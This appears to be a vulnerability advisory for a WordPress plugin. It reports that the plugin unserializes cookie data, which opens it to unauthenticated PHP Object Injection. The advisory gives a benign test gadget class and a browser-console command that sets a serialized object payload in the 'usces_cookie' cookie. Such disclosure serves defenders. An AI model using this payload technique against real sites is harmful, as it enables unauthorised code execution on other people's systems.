Description The plugin unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then execute the command below in the web developer console of the browser when on the blog as unauthenticated:
document.cookie='usces_cookie=O:4:"Evil":0:{}'
Refresh the page to see the 'Arbitrary deserialization' message displayed